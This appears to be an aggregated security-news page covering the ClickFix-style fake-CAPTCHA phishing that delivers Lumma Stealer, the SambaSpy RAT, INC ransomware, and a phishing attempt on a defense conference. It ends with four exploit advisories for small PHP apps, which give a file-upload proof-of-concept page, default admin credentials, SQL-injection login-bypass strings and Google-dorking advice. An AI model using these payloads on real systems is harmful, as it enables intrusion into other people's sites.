Many GitHub users this week received a novel phishing email warning of critical security holes in their code. Those who clicked the link for details were asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware. While it's unlikely that many programmers fell for this scam, it's notable because less targeted versions of it are likely to be far more successful against the average Windows user.

Many **GitHub** users this week received a novel phishing email warning of critical security holes in their code. Those who clicked the link for details were asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes **Microsoft Windows** to download password-stealing malware. While it’s unlikely that many programmers fell for this scam, it’s notable because less targeted versions of it are likely to be far more successful against the average Windows user.

A reader named Chris shared an email he received this week that spoofed GitHub’s security team and warned: “Hey there! We have detected a security vulnerability in your repository. Please contact us at https://github-scanner\[.\]com to get more information on how to fix this issue.”

Visiting that link generates a web page that asks the visitor to “Verify You Are Human” by solving an unusual CAPTCHA.

This malware attack pretends to be a CAPTCHA intended to separate humans from bots.

Clicking the “I’m not a robot” button generates a pop-up message asking the user to take three sequential steps to prove their humanity. Step 1 involves simultaneously pressing the keyboard key with the Windows icon and the letter “R,” which opens a Windows “Run” prompt that will execute any specified program that is already installed on the system.

Executing this series of keypresses prompts the built-in Windows Powershell to download password-stealing malware.

Step 2 asks the user to press the “CTRL” key and the letter “V” at the same time, which pastes malicious code from the site’s virtual clipboard.

Step 3 — pressing the “Enter” key — causes Windows to launch a **PowerShell** command, and then fetch and execute a malicious file from github-scanner\[.\]com called “**l6e.exe**.”

PowerShell is a powerful, cross-platform automation tool built into Windows that is designed to make it simpler for administrators to automate tasks on a PC or across multiple computers on the same network.

According to an analysis at the malware scanning service **Virustotal.com**, the malicious file downloaded by the pasted text is called **Lumma Stealer**, and it’s designed to snarf any credentials stored on the victim’s PC.

This phishing campaign may not have fooled many programmers, who no doubt natively understand that pressing the Windows and “R” keys will open up a “Run” prompt, or that Ctrl-V will dump the contents of the clipboard.

But I bet the same approach would work just fine to trick some of my less tech-savvy friends and relatives into running malware on their PCs. I’d also bet none of these people have ever heard of PowerShell, let alone had occasion to intentionally launch a PowerShell terminal.

Given those realities, it would be nice if there were a simple way to disable or at least heavily restrict PowerShell for normal end users for whom it could become more of a liability.

However, Microsoft strongly advises against nixing PowerShell because some core system processes and tasks may not function properly without it. What’s more, doing so requires tinkering with sensitive settings in the Windows registry, which can be a dicey undertaking even for the learned.

Still, it wouldn’t hurt to share this article with the Windows users in your life who fit the less-savvy profile. Because this particular scam has a great deal of room for growth and creativity.

This Windows PowerShell Phish Has Scary Potential

This year, Congress only allocated $55 million in federal grant dollars to states for security and other election improvements.

Thursday, September 19, 2024 14:00

Last week, six Secretaries of State testified to U.S. Congress about the current state of election security ahead of November’s Presidential election. 

Some of the same topics came up as usual — disinformation campaigns, influence from foreign actors, and the physical protection of poll workers on election day. 

It’s good that these conversations are continuing after the various revelations that came out after the 2016 presidential election, and election security is an issue globally, especially this year when there are major elections taking place in hundreds of countries.  

As with many things in politics and life, though, there is still an issue of money. 

Talk of the importance of election security is positive, but at the end of the day, states and municipalities will need monetary and human resources to implement the appropriate defenses and protect everything from voting machines to online vote-tallying systems and social media disinformation campaigns.  

Arizona Secretary of State Adrian Fontes used his time in front of Congress to ask for additional funding, because his state has been unable to execute all their election security goals.  

“None of this is free and none of it is cheap,” he said. “Our operations, administration and security depend on intermittent, rare and never enough funding for the Help America Vote Act grants that we are occasionally given by Congress.” 

Additional federal funds became available for U.S. elections in 2017 after the Department of Homeland Security deemed election systems to be critical infrastructure. But this year, Congress only allocated $55 million in federal grant dollars to states for security and other improvements to elections. For comparison’s sake, presidential and Congressional candidates in the U.S. spent $14 billion on their election campaigns, more than double the amount from 2016. 

At the time, Republican lawmakers in the House voted to totally zero out the fund for the Help America Vote Act, or HAVA, grants, which have existed since 2002. 

One lobbyist even told the Stateline outlet earlier this year that many states were trying to stretch the money they do get from the HAVA program across multiple years for fear of a lack of funding in the coming election cycles.  

JP Martin, deputy communications director for the Arizona secretary of state, said in that same article that Arizona (a crucial swing state in most presidential elections) has had to put a hiring freeze in place because a lack of federal funding. 

So, talk, awareness and planning to secure elections are all positive things. But at the end of the day, all these technologies and solutions, and the people that provide them, cost money. 

**The one big thing **

Cisco Talos’ Vulnerability Research team discovered two vulnerabilities have been disclosed and fixed over the past few weeks. Talos discovered a time-of-check time-of-use vulnerability in Adobe Acrobat Reader, one of the most popular PDF readers currently available, and an information disclosure vulnerability in the Microsoft Windows AllJoyn API. 

**Why do I care? **

AllJoyn is a DCOM-like framework for creating method calls or sending one-way signals between applications on a distributed bus. It primarily is used in internet-of-things (IoT) devices to tell the devices to perform certain tasks, like turning lights on or off or reading the temperature of a space. TALOS-2024-1980 (CVE-2024-38257) could allow an adversary to view uninitialized memory on the targeted machine. Adobe Acrobat Reader, one of the most popular pieces of PDF reading software currently available, contains a time-of-check, use-after-free vulnerability that could trigger memory corruption, and eventually, arbitrary code execution. 

**So now what? **

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

**Top security headlines of the week **

**Experts and governments are still unpacking a wave of pager and handheld radio explosions in the Middle East.** The attacks appeared to target members of the armed group Hezbollah in Lebanon when hundreds of devices exploded simultaneously on Tuesday, killing multiple people. The international community has been left wondering if this was some type of cyber attack or intentional physical implants in the devices. Messages sent at the time of the attack appeared to come from Hezbollah leadership but instead triggered the explosions. Most analysts are assuming that this was a hardware supply chain attack, in which the pagers were tampered with somehow during manufacturing or while they were in transit. Supply chain attacks are normally carried out at the software level. So far, no one has taken credit for the attacks, though Hezbollah is blaming Israel, one of its chief antagonists. (Reuters, BBC) 

**Ransomware gangs are increasingly leveraging Microsoft Azure to steal victims’ information and store it.** New research findings indicate that groups like BianLian and Rhysida use Microsoft's Azure Storage Explorer and AzCopy to steal data from infiltrated networks, then store it in Azure Blob storage until it can be transferred to an attacker-controlled network. Because Azure is a popular and trusted service, corporate firewalls and security tools are unlikely to block it, making the data transfers more likely to pass undetected. Potential targets that use Azure are recommended to log out of the application after each use to prevent attackers from using the active session for file theft. (Bleeping Computer, modePUSH) 

**Health care facilities and medical devices continue to be top targets for ransomware actors, and industry leaders are calling on the U.S. federal government to do more to assist them.** This year, several massive health care providers across the globe have been affected by cyber attacks, forcing countless surgeries and appointments to be rescheduled and putting sensitive medical records at risk. Past victims include Change Healthcare, Kaiser Permanente and Ascension. One health care executive told NPR that their company was still trying to calculate the financial impact of the Change attack, which paused payments from insurance for months. They are only just now being paid out for services rendered in July. U.S. Sen. Ron Wyden, the chair of the Senate Finance Committee, recently publicly called on the Health and Human Services Department to revise its current approach to cybersecurity, because the current system “is woefully inadequate and has left the health care system vulnerable to criminals and foreign government hackers.” Other experts have said that HHS has traditionally focused on physical disasters like earthquakes, storms and power outages, and not enough on cyberspace. (NPR, Security Intelligence) 

**Can’t get enough Talos? **

*   Despite Russia warnings, Western critical infrastructure remains unprepared 
*   The Cybersecurity Cat-And-Mouse Game 
*   DragonRank Manipulates SEO Rankings To Direct Users To Malicious Sites 

**Upcoming events where you can find Talos**

**VB2024** **(Oct. 2 - 4)** 

_Dublin, Ireland_ 

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**misecCON** **(Nov. 22)** 

_Lansing, Michigan_

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting.

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** b9ddbd1a4cec61e6b022a275d66312b5b676f9a0a9537a7708de9aa8ce34de59   
**MD5:** 3b100bdcd61bb1da816cd7eaf9ef13ba   
**Typical Filename:** vt-upload-C6In1   
**Claimed Product:** N/A    
**Detection Name:** Backdoor:KillAV-tpd  

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
**MD5:** 71fea034b422e4a17ebb06022532fdde   
**Typical Filename:** VID001.exe   
**Claimed Product:** N/A   
**Detection Name:** RF.Talos.80 

**SHA 256:** 70ff63cd695033f624a456a5c8511ce8312cffd8ac40492ffe5dc7ae18548668   
**MD5:** 49d35332a1c6fefae1d31a581a66ab46   
**Typical Filename:** 49d35332a1c6fefae1d31a581a66ab46.virus   
**Claimed Product:** N/A     
**Detection Name:** W32.Auto:70ff63.in03.Talos 

**SHA 256:** 3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66   
**MD5:** 8b84d61bf3ffec822e2daf4a3665308c   
**Typical Filename:** RemComSvc.exe   
**Claimed Product:** N/A   
**Detection Name:** W32.3A2EA65FAE-95.SBX.TG 

**SHA 256:** 35dcf857f0bb2ea75bf4582b67a2a72d7e21d96562b4c8a61b5d598bd2327c2c   
**MD5:** fab8aabfdabe44c9a1ffa779fda207db   
**Typical Filename:** ACenter.exe   
**Claimed Product:** Aranda AGENT   
**Detection Name:** Win.Trojan.Generic::tg.talos

Talk of election security is good, but we still need more money to solve the problem

A new phishing campaign uses fake CAPTCHA verification pages to trick Windows users into running malicious PowerShell commands,…

A new phishing campaign uses fake CAPTCHA verification pages to trick Windows users into running malicious PowerShell commands, installing the Lumma Stealer malware and stealing sensitive information. Stay informed and protected.

Cybersecurity researchers at CloudSec have discovered a new phishing campaign that is tricking users into running malicious commands through fake human verification pages. The campaign, which primarily targets Windows users, aims to install the **Lumma Stealer malware**, leading to the theft of sensitive information.

**How the Attack Works**

Threat actors are creating phishing sites hosted on various platforms, including Amazon S3 buckets and Content Delivery Networks (CDNs). These sites mimic legitimate verification pages, such as fake **Google CAPTCHA** pages. When users click the “Verify” button, they are presented with unusual instructions:

1.  **Open the Run dialog (Win+R)**
2.  **Press Ctrl+V**
3.  **Hit Enter**

Unknown to the user, these actions execute a hidden JavaScript function that copies a base64-encoded PowerShell command to the clipboard. When the user pastes and runs the command, it downloads the Lumma Stealer malware from a remote server.

CloudSec’s **report** shared with Hackread.com ahead of publishing on Thursday, revealed that the downloaded malware often downloads additional malicious components, making detection and removal more difficult. While currently used to spread Lumma Stealer, this technique could be easily adapted to deliver other types of malware.

Attack flow and fake verification process triggered when the user clicks on the fake Google CAPTCHA prompt (Screenshot: CloudSec)

For your information, the Lumma Stealer is designed to steal sensitive data from the infected device. While the specific data targeted can vary, it often includes login credentials, financial information, and personal files. This latest campaign came just days after the malware was caught disguising itself as an **OnlyFans hacker tool**, infecting the devices of other hackers.

**In January 2024**, Lumma was discovered to be spreading through cracked software distributed via compromised YouTube channels. Earlier, **in November 2023**, researchers had identified a new version of LummaC2, called LummaC2 v4.0, which was stealing user data using trigonometric techniques to detect human users.

> I hereby confirm. https://t.co/1q4cARQLDM pic.twitter.com/GEBzqJeaSs
> 
> — Waqas (@WAK4S) December 31, 2023

****What Now?****

Now that the new Lumma stealer infection spree has been reported, businesses and unsuspecting users need to stay alert and avoid falling for the latest fake verification scam. Here are some common-sense rules and simple yet essential tips for protection against Lumma and other similar stealers:

*   **Educate yourself and others:** Share this information with friends, family, and colleagues to raise awareness about this new threat.
*   **Be wary of unusual verification requests:** Legitimate websites rarely ask users to execute commands through the “Run” dialogue box. Be suspicious of any site that makes such requests.
*   **Don’t copy and paste unknown commands:** Avoid copying and pasting anything from untrusted sources, especially commands meant to be run in a terminal or command prompt.
*   **Keep your software updated:** Ensure your operating system and antivirus software are up-to-date to patch known vulnerabilities.
*   **Most Important:** Follow Hackread.com for the latest cybersecurity news.

1.  **Fake Antivirus Sites Spread Malware**
2.  **Analysis of Top Infostealers: Redline, Vidar, Formbook**
3.  **Hackers using CAPTCHA to evade phishing, malware detection**
4.  **Unicode QR Code Phishing Scam Bypasses Traditional Security**
5.  **Android banking malware distributed with fake Google reCAPTCHA**

Fake CAPTCHA Verification Pages Spreading Lumma Stealer Malware

A previously undocumented malware called SambaSpy is exclusively targeting users in Italy via a phishing campaign orchestrated by a suspected Brazilian Portuguese-speaking threat actor.
"Threat actors usually try to cast a wide net to maximize their profits, but these attackers are focused on just one country," Kaspersky said in a new analysis. "It's likely that the attackers are testing the

A previously undocumented malware called SambaSpy is exclusively targeting users in Italy via a phishing campaign orchestrated by a suspected Brazilian Portuguese-speaking threat actor.

"Threat actors usually try to cast a wide net to maximize their profits, but these attackers are focused on just one country," Kaspersky said in a new analysis. "It's likely that the attackers are testing the waters with Italian users before expanding their operation to other countries."

The starting point of the attack is a phishing email that either includes an HTML attachment or an embedded link that initiates the infection process. Should the HTML attachment be opened, a ZIP archive containing an interim downloader or dropper is used to deploy and launch the multi-functional RAT payload.

The downloader, for its part, is responsible for fetching the malware from a remote server. The dropper, on the other hand, does the same thing, but extracts the payload from the archive instead of retrieving it from an external location.

The second infection chain with the booby-trapped link is a lot more elaborate, as clicking it redirects the user to a legitimate invoice hosted on FattureInCloud if they are not the intended target.

In an alternate scenario, clicking on the same URL takes the victim to a malicious web server that serves an HTML page with JavaScript code featuring comments written in Brazilian Portuguese.

"It redirects users to a malicious OneDrive URL but only if they are running Edge, Firefox, or Chrome with their language set to Italian," the Russian cybersecurity vendor said. "If the users don't pass these checks, they stay on the page."

Users who meet these requirements are served a PDF document hosted on Microsoft OneDrive that instructs the users to click on a hyperlink to view the document, following which they are led to a malicious JAR file hosted on MediaFire containing either the downloader or the dropper as before.

A fully-featured remote access trojan developed in Java, SambaSpy is nothing short of a Swiss Army knife that can handle file system management, process management, remote desktop management, file upload/download, webcam control, keylogging and clipboard tracking, screenshot capture, and remote shell.

It's also equipped to load additional plugins at runtime by launching a file on the disk previously downloaded by the RAT, allowing it to augment its capabilities as needed. On top of that, it's designed to steal credentials from web browsers like Chrome, Edge, Opera, Brave, Iridium, and Vivaldi.

Infrastructure evidence suggests that the threat actor behind the campaign is also setting their sights on Brazil and Spain, pointing to an operational expansion.

"There are various connections with Brazil, such as language artifacts in the code and domains targeting Brazilian users," Kaspersky said. "This aligns with the fact that attackers from Latin America often target European countries with closely related languages, namely Italy, Spain, and Portugal."

**New BBTok and Mekotio Campaigns Target Latin America**

The development comes weeks after Trend Micro warned of a surge in campaigns delivering banking trojans such as BBTok, Grandoreiro, and Mekotio targeting the Latin American region via phishing scams that utilize business transactions and judicial-related transactions as lures.

Mekotio "employs a new technique where the trojan's PowerShell script is now obfuscated, enhancing its ability to evade detection," the company said, highlighting BBTok's use of phishing links to download ZIP or ISO files containing LNK files that act as a trigger point for the infections.

The LNK file is used to advance to the next step by launching the legitimate MSBuild.exe binary, which is present within the ISO file. It subsequently loads a malicious XML file also hidden within the ISO archive, which then leverages rundll32.exe to launch the BBTok DLL payload.

"By using the legitimate Windows utility MSBuild.exe, attackers can execute their malicious code while evading detection," Trend Micro noted.

The attack chains associated with Mekotio commence with a malicious URL in the phishing email that, when clicked, directs the user to a bogus website that delivers a ZIP archive, which contains a batch file that's engineered to run a PowerShell script.

The PowerShell script acts as a second-stage downloader to launch the trojan by means of an AutoHotKey script, but not before conducting a reconnaissance of the victim environment to confirm it's indeed located in one of the targeted countries.

"More sophisticated phishing scams targeting Latin American users to steal sensitive banking credentials and carry out unauthorized banking transactions underscores the urgent need for enhanced cybersecurity measures against increasingly advanced methods employed by cybercriminals," Trend Micro researchers said.

"These trojans \[have\] grown increasingly adept at evading detection and stealing sensitive information while the gangs behind them become bolder in targeting larger groups for more profit."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Brazilian-Linked SambaSpy Malware Targets Italian Users via Phishing Emails

Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S.
The tech giant's threat intelligence team is tracking the activity under the name Vanilla Tempest (formerly DEV-0832).
"Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494,

Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S.

The tech giant's threat intelligence team is tracking the activity under the name **Vanilla Tempest** (formerly DEV-0832).

"Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494, before deploying tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool," it said in a series of posts shared on X.

In the next step, the attackers proceed to carry out lateral movement through Remote Desktop Protocol (RDP) and then use the Windows Management Instrumentation (WMI) Provider Host to deploy the INC ransomware payload.

The Windows maker said Vanilla Tempest has been active since at least July 2022, with previous attacks targeting education, healthcare, IT, and manufacturing sectors using various ransomware families such as BlackCat, Quantum Locker, Zeppelin, and Rhysida.

It's worth noting that the threat actor is also tracked under the name Vice Society, which is known for employing already existing lockers to carry out their attacks, as opposed to building a custom version of their own.

The development comes as ransomware groups like BianLian and Rhysida have been observed increasingly using Azure Storage Explorer and AzCopy to exfiltrate sensitive data from compromised networks in an attempt to evade detection.

"This tool, used for managing Azure storage and objects within it, is being repurposed by threat actors for large-scale data transfers to cloud storage," modePUSH researcher Britton Manahan said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of New INC Ransomware Targeting U.S. Healthcare Sector

Hackers sent a convincing lure document, but after 20 years of similar attacks, the target organization was well prepared.

Source: elifbayraktar via Alamy Stock Photo

A meeting of influential figures in and around the US and Taiwanese defense industries has been targeted by a phishing attack carrying fileless malware.

The 23rd US-Taiwan Defense Industry Conference will be held next week in Philadelphia's Logan Square neighborhood. Closed to the press, it will feature speakers from government, defense, academia, and commercial sectors in the US and Taiwan. The focus, according to its website, will be "addressing the future of US defense cooperation with Taiwan, the defense procurement process, and Taiwan's defense and national security needs."

Recently, the US-Taiwan Business Council — the organization behind the event — was sent a malicious forgery of its own registration form. The form was paired with information-stealing malware designed to execute entirely in memory, making it more difficult to detect with traditional antivirus software. Thanks to diligent anti-phishing preparations, however, the council quickly rebuffed the attack.

**Threats to a Taiwan Defense Conference**

Eight years ago, a Chinese phishing email was sent to members of Taiwan's defense industry, including some attendees of the 15th US-Taiwan Defense Industry Conference. Even by then, though, it was old hat.

"In the period from 2003 to 2011, we were heavily targeted with spear-phishing emails constantly," reports Lotta Danielsson, vice president of the US-Taiwan Business Council. "There was an uptick in 2016-2017, but it has been very quiet for the last several years. Usually, it increases in the leadup to and right after the annual defense conference, then it subsides again."

In the leadup to this year's conference, rather than attendees, the attack seemed to target the council itself. It came in an email, from an individual posing as a potential attendee. Rather than use the event's online form, the impersonator sent a filled out copy of the registration form as a PDF, which attendees can do if they experience technical issues with the site.

Source: Cyble

The document, according to analysis from Cyble, came with a ZIP file that was supposed to drop a malicious Windows shortcut (LNK) file. If opened, the LNK would have established persistence on its targeted machine by placing an executable file in the Windows startup folder. Upon reboot, the executable would download additional payloads to be executed directly in the machine's memory, without saving any files to disk. Ultimately, the malware could exfiltrate data back to an attacker-controlled server through Web requests designed to blend with normal network traffic.

Cyble researchers were unable to tie the attack to any specific threat actor. They noted, however, that Chinese entities in particular have a long history of targeting Taiwan.

"We've seen very clearly in the last few years that there are a lot of problems in East Asian geopolitics — military-related movements in the South China Sea, very sharp comments coming from Taiwan and China. And it looks like nation states are interested in US-Taiwan defense cooperation," says Kaustubh Medhe, head of research and intelligence for Cyble.

This latest phishing attempt fits neatly into that picture. "We have a strong suspicion that this could be used as a stealthy technique to perform long-term surveillance of people with a specific interest in this particular topic," he says.

**A Textbook Case of How to Prevent Phishing**

As Danielsson recalls, "We have been targeted by these types of spear phishing emails for a long time — more than 20 years — so we flagged it as suspicious right away. We did not open the file. Instead, we submitted it to VirusTotal and confirmed that it was malicious. Then we deleted it, and that was pretty much it."

She highlights a few keys to success that have helped the Council easily swat away its many phishing attacks over the years. "One is educational, so the entire staff is well educated on these types of attacks. Nobody clicks links in emails, or opens documents sent via email, unless we have talked to people directly and are expecting them. Even then, we often scan them before opening, unless the presumed content is very sensitive, in which case we will call people to double-check that they sent them," she says.

Besides that, she adds, "We keep our email clients text-only so it's easy to see any obfuscation of links right away. I log all traffic in and out of our system and keep an eye out for anomalies. We also take our entire system offline at night and on weekends, air-gapping our computers and internal IT systems. This is doable because we are a small office with three people, something that might be harder for a larger organization. I also have some relationships with people who work in the cybersecurity industry, and they have helped us think through what to do if we do end up failing to prevent an issue. We want to be prepared if it does."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Phishing Espionage Attack Targets US-Taiwan Defense Conference

Online Traffic Offense version 1.0 suffers from cross site request forgery and arbitrary file upload vulnerabilities.

    =============================================================================================================================================| # Title     : Online Traffic Offense 1.0 Auth by Pass Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.[+] Line 33 : Set your target url[+] save payload as poc.html [+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Direct File Upload</title></head><body>    <h2>Direct File Upload</h2>    <form id="uploadForm">        <label for="fileInput">Select File:</label>        <input type="file" id="fileInput" name="fileInput" required><br><br>        <button type="button" onclick="uploadFile()">Upload File</button>    </form>    <script>        function uploadFile() {            const fileInput = document.getElementById('fileInput').files[0];            if (!fileInput) {                alert('Please select a file.');                return;            }            const formData = new FormData();            formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');            formData.append('img', fileInput);            console.log("(+) Uploading file...");            fetch('http://127.0.0.1/traffic_offense/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL                method: 'POST',                body: formData            })            .then(response => response.text())            .then(data => {                if (data === '1') {                    console.log("(+) File upload seems to have been successful!");                } else {                    console.log("(-) Oh no, the file upload seems to have failed!");                }            })            .catch(error => console.error("(-) Error during file upload:", error));        }    </script></body></html>        Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Traffic Offense 1.0 CSRF / Arbitrary File Upload

Online Exam System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Online Exam System  1.0 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_exam-zip.zip                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: 123[+] http://127.0.0.1/exam/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Online Exam System 1.0 Insecure Settings

Online Bus Ticket Booking Website version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : online bus ticket booking Website v1.0 Auth By PAss Vulnerability                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_online-bus-ticket-booking-.zip           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] User : 'or''='@gmail.com & PAss = 'or''='[+] http://127.0.0.1/online-bus-ticket-booking-Website/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Bus Ticket Booking Website 1.0 SQL Injection

Nipah Virus Testing Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Nipah virus (NiV) – Testing Management System 1.0 Auth By Pass Vulnerability                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer & PASs : ' or 0=0 ##[+] http://127.0.0.1/nipah-tms/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Tag

#windows